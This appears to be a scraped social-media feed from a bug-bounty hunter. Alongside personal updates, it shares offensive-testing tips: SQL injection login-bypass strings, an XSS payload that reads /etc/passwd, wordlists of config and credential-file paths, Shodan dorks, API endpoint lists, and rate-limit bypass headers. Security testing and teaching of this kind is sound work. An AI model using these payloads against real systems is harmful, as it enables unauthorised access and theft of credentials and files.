Pinned
Aditya
12.4K posts
- Happy to tell you. Got offer letter from cambridge campus university ARU , UK. Masters in cyber security + offensive security. I am travelling to UK after 6 months. So if there is physical meetup like nullcon, owasp meets etc . Will meet โค๏ธโค๏ธโค๏ธ
- Burpsuite extension to bypass 403 restricted directory. Installation BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh. github.com/sting8k/BurpSuโฆ
- or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'--
- Few dorks which I use to find common bugs while testing. Add your so itโll help others ssl.cert.subject.CN:"*.target. com" http.title:"index of/" ssl.cert.subject.CN:"*.target. com" http.title:"gitlab" ssl.cert.subject.CN:"*.wur.nl" http.title:"gitlab"
- /api/v1/account/accounts /api/v1/account/accounts/summaries /api/v1/account/oauth/token /api/v1/account/oauth/ticket /api/v1/account/permissions /api/v1/account/user /api/v1/account/user/assets /api/v1/account/user/delete /api/v1/account/user/profile
- Payload: <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> Reference: blog.dixitaditya.com/xss-to-read-inโฆ
- /.config.php /.git/config ////../../data/config/microsrv.cfg //admin/config.php /admin/config.php /administrator/webconfig.txt.php /app.config /audit.config /Cassini.exe.config /ccnet.config /cgi-bin/config.exp /conceptual.config /config /config.inc /config.inc.php
- Rate Limiting Bypass IP Rotation --> Sending new ip's Null byte -- %00,%0d%0a,%09 exapmple:email:[email protected]%00 4. X-Forwarded-For: IP ex:X-Forwarded-For: 127.0.0.1 5. Double X forward option ex: X-Forwarded-For: X-Forwarded-For:127.0.0.1
- Finally ๐ construction completed with help of big bounties, investment, stock trade. And obviously farming ๐๐
- SAML Security Testing Tutorial: 1 - epi052.gitlab.io/notes-to-self/โฆ 2 - epi052.gitlab.io/notes-to-self/โฆ 3 - epi052.gitlab.io/notes-to-self/โฆ Surface: github.com/kelbyludwig/saโฆ Examples: - secretsofappsecurity.blogspot.com/2017/01/saml-sโฆ - seanmelia.wordpress.com/2016/01/09/xxeโฆ - hackerone.com/reports/136169 #kongsec






